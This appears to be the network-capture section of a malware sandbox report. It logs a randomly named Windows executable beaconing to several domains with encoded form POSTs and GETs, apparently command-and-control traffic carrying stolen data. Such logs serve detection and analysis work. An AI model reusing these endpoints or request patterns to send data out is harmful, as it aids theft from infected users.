                                                                                  Nov 13, 2024 15:35:57.835639000 CET | 439 | OUT | GET /ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.7vh2wy.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:58.869076014 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Nov 13, 2024 15:36:00.242563009 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Nov 13, 2024 15:36:00.246177912 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 50011 | Destination IP: 172.67.197.57 | Destination Port: 80 | PID: 3160 | Process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:04.225693941 CET | 709 | OUT | POST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=QWvXGib3GR66JhApssKJj9/Fz53wdU905mognmIE3lV2fbwb1CIZ+pbOY8QxmuJCE05KSiXj1wpRnZioXMKhZAramEMLQbLHjEUkLNVH5UiGETS3ZM+H7zsPPrY3+ne6Mawc+iUA3ucPZgMTVAS/QvsgTmGZDyW4YNm1giND85loR3JTgULFgTvuXaERAIY/H8MwfNQ=
                                                                                  Nov 13, 2024 15:36:05.113054991 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YQePIRYgS0X4yDeWfmMu7ZE0Hrd3IjYFPqzUFkACSCb2AqjyF236yOZwMUtN0Y97YcHzQRtj%2BnXuySmFfWcY13twaEVXUIBpb7hwfvpGZwlbgqqBOz8JzrGlrzuqniJKB4ni%2Bgm"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7df18dec6b97-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Nov 13, 2024 15:36:05.114892006 CET | 341 | IN | (remainder of the gzip-compressed response body)


                                                                                  Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50012 | Destination IP: 172.67.197.57 | Destination Port: 80 | PID: 3160 | Process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:06.775327921 CET | 729 | OUT | POST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=QWvXGib3GR66bxQpuLeJld/E9Z3wU09w5nUgnnMyrB52e6AbzzIZ7pbOAMQ0rOJzE1FoSnvj1wVRncGoQ7+gZQrcvkMVf7LHjEUkLL5p5VKGEii3WN+E1TsIerY36ne2Maw++mUq3sUPZh8TSRS4HftpQWHpMCrCXM69iD8AnJ9Pdh4562DtzzDWHJMmR45WdfcABaF04xRgw+zNDDqKh/Sp/Cwp
                                                                                  Nov 13, 2024 15:36:07.717477083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h34ACzVB0bqwnNQpa%2FyDXh14QAQSBSfr43W4XnbD3VkbMW%2FTEB5TNiMHNS%2BaK5V8H4J%2BE150zUzbVh5VBKSPcXum6cFaiWqxOPA%2BpT%2BsUhf%2BE8BJSy9a0A8f8u7UoF8xpaXdjOHH"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e019eef2e57-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Nov 13, 2024 15:36:07.717632055 CET | 351 | IN | (remainder of the gzip-compressed response body)


                                                                                  Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 50013 | Destination IP: 172.67.197.57 | Destination Port: 80 | PID: 3160 | Process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:09.317289114 CET | 1746 | OUT | POST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:10.181864977 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2euP4URg1J2vz3b62ZFwQbff6SE%2Fphv7Jp%2FgCbvP34epSrvesLZwSEUZRRe6zftrlmvTl9KRlbjAE%2Bpl3kGEVovEwyaYiyaDzq6R1ZymjdGO9L63NQa4A9rXRlhxMftVRkmxM7s"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e1178150c03-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1822&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1746&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.5 | 50014 | 172.67.197.57 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:11.863580942 CET | 444 | OUT | GET /b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:12.732916117 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuB8W0H13iVlOUSTVbHzFlx9p9D2fhF8LS5wQeXcCZ3aToVDlE1qClAKh6JNKz2nmYc3CwzKbUe%2Fa5ZFGCpFDTKN02J%2FGo3xFve3ROVFU%2FfJQ6H58mv%2Bt8hcJYVflf75Ix9EIFIc"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e215f6c0bfb-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1387&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=444&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14p
                                                                                  Nov 13, 2024 15:36:12.733031988 CET | 1005 | IN
                                                                                  Data Ascii: x; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.5 | 50015 | 50.18.131.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:17.977659941 CET | 715 | OUT | POST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9p9FqBkDgqiC/6r3cDAwTScrbr3a/nUWx/JChZGZAG4XaCJBsAMzF4dAfkTrr0ztmxXNj6F6Ihyb9rjrXD4/PQLBsZrkQahgQJ7PjhrPehZkP5W0ZBTUMzRNWMORdc4n4fxOi7bd3ylxpVXY6+wrcPpPhXRG6WEu/5G1HNMY3dlUwCSTRxRBiNkqFOrk=
                                                                                  Nov 13, 2024 15:36:18.895979881 CET | 1236 | IN | HTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:18 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=776d5855-197b-4456-bdb0-1e7a1735a9d8;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.5 | 50016 | 50.18.131.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:20.531511068 CET | 735 | OUT | POST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9odVqDD3g9yC85r3cKgwpScnbrzCJnmyx8tGhYCNAH4XaNZBpPszO4dEpkTnr0z5mxTdj506Lhib/+TrVbY/PQLBsZqF7aiQQJPzjz6Pds5kA+W0ZFTUIzRMsMPdnc6v4fw+i7Ox07lxzIHYvtxakMJ/hKTPwXTKr4wEtXuQfOF4ISBbmghgLXH61Q8yZWz+/NJndzrIvqdvKueB5
                                                                                  Nov 13, 2024 15:36:21.192511082 CET | 1236 | IN | HTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:21 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=EQuUlB2+bOBJDJhhXe3aOfgaWAN8lG6Q/65p7JxxFDL6t7Q4tgQjbx+hYSCGWVjqK8TeuAjsX6Fou14FlBx7tq/UoSehvbKUhpI8zddtMzqrm8im9SZAeDjiGL+S; Expires=Wed, 20 Nov 2024 14:36:21 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=EQuUlB2+bOBJDJhhXe3aOfgaWAN8lG6Q/65p7JxxFDL6t7Q4tgQjbx+hYSCGWVjqK8TeuAjsX6Fou14FlBx7tq/UoSehvbKUhpI8zddtMzqrm8im9SZAeDjiGL+S; Expires=Wed, 20 Nov 2024 14:36:21 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=af74a505-5ef0-41de-803a-579c3abd654f;Path=/;Expires=Thu, 12-Nov-2054 22:27:51 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:51 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508581098;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508581098;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.5 | 50017 | 50.18.131.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:23.090507984 CET | 1752 | OUT | POST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9odVqDD3g9yC85r3cKgwpScnbrzCJnm6x8YShZjNAE4XaOZBoPszp4chgkSbR0xBmr01j8GSLvib/8TrWD4+VQLxoZq17aiQQJOjjwrPdu5kP5W1NBTUgzRFOMPYQdKP4eQui3cJ00lx1JHZqtxW7MKLXKSLeXV6r5UtMCddJMVcyeSH7n0wZU0aoTvb6fgCTDZjv54Bf5ZfErbUany7VN9gGolzcwPssIXMhdWWEWCf1Qp4J8YExvLLBv4r73Miu2KxuT/OrwxSwPpIJvuO+CwJJExOcX5egBnwTrbzzFNJYqmjuLsZTjsZpNbeHe6eGMxqfd9ja/2VCUfBjyEZMgp7rKm6yAvkOCZpPnCYv8pgq+ZUD8ke/lpLv95gkcBm+vqng33fhrHmj+/9Qkxn10OmLc+EvjJFvGxXqEPOOvriB/SLaUYYijFn8Ad8OkAI4x7hC0s4W8/g7+IN/y6gxMiAxW3+o+0IPuREmit2DYanfyq89B1Ixd8G+cSVK4HHmTeF0EZGcSKntxWGZeLlj4efNFACDzi/yjqVKLPmzhBiChiIRAxjwVMcAzpVLYKYS1BeV8IyU3BzaAxxy19w0AF1RMQdjFd0Xr5LbPwzhssuUXFNbHbTLeGjcciKsp/zM/naB1u9w61ZQJrS5V8INMVUameiXBHgSFsbtad9MjktP78kUqfCdm69uwO8b3b/YwZtoFtWGg7265rHfNyZb9Awp7+dyMxtV/GsqNyzzsSpocqEsqodFZpyy7iHQtKlFZXtX/inCO0glTKuCJcuw34zMyCe89KugMQn6tEju2fTrd/CMToDAODgjxKTfiQ9X8vMNzMNXx+JQdy4C45vtRux3gyQE6+4IrtWaDTsM7Gn3yaA8Kx/yMZsJRhIZfSQTcxVwZFk/pPRU3M9WnqxoX73pBM7aGDyl5ozxRvyN/dA/RL12B3fFg3HHbC1oxPxc/Ti2AjJ9Bq6SpndNOeOQHZgExtkrEvKQNkGmZ [TRUNCATED]
                                                                                  Nov 13, 2024 15:36:23.778850079 CET | 1236 | IN | HTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:23 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=ro+ktLKCkXT1ZnjEnv0MsDK2xk8oAopFBeH8CLd1jjVlvUbK0NV7CuUskyu5470SiYJB6EPLaUKZL0rFZL46ojjFmmx1Wk6VgvY4azrTeNC/70xhWdKk5TRNZavm; Expires=Wed, 20 Nov 2024 14:36:23 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=ro+ktLKCkXT1ZnjEnv0MsDK2xk8oAopFBeH8CLd1jjVlvUbK0NV7CuUskyu5470SiYJB6EPLaUKZL0rFZL46ojjFmmx1Wk6VgvY4azrTeNC/70xhWdKk5TRNZavm; Expires=Wed, 20 Nov 2024 14:36:23 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=08ac740d-6d2e-48c3-bbb2-c9f12ab6be5e;Path=/;Expires=Thu, 12-Nov-2054 22:27:53 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:53 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508583684;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508583684;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Content-Encoding: gzip
                                                                                  Nov 13, 2024 15:36:23.779068947 CET | 505 | IN


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.5 | 50018 | 50.18.131.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:36:25.628222942 CET | 446 | OUT | GET /jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.129glenforest.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:26.699529886 CET | 1236 | IN | HTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:26 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Content-Length: 1192
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=e16447c0-4acc-4667-bfa9-7d2affaace7c;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>129 Glenforest Rd.</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet"
                                                                                  Nov 13, 2024 15:36:26.699551105 CET | 1001 | IN
                                                                                  Data Ascii: href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"><link rel="stylesheet" href="/plugins/bootstrap-4.6.2/css/bootstrap.min.css"><link href="/views/themes/_common/css/property-lead.css?v=1.0.1" rel="stylesheet"></head>
                                                                                  Nov 13, 2024 15:36:26.699562073 CET | 1001 | IN
                                                                                  Data Ascii: href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"><link rel="stylesheet" href="/plugins/bootstrap-4.6.2/css/bootstrap.min.css"><link href="/views/themes/_common/css/property-lead.css?v=1.0.1" rel="stylesheet"></head>
                                                                                  Nov 13, 2024 15:36:26.700324059 CET | 1236 | IN | HTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:26 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Content-Length: 1192
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/; SameSite=None
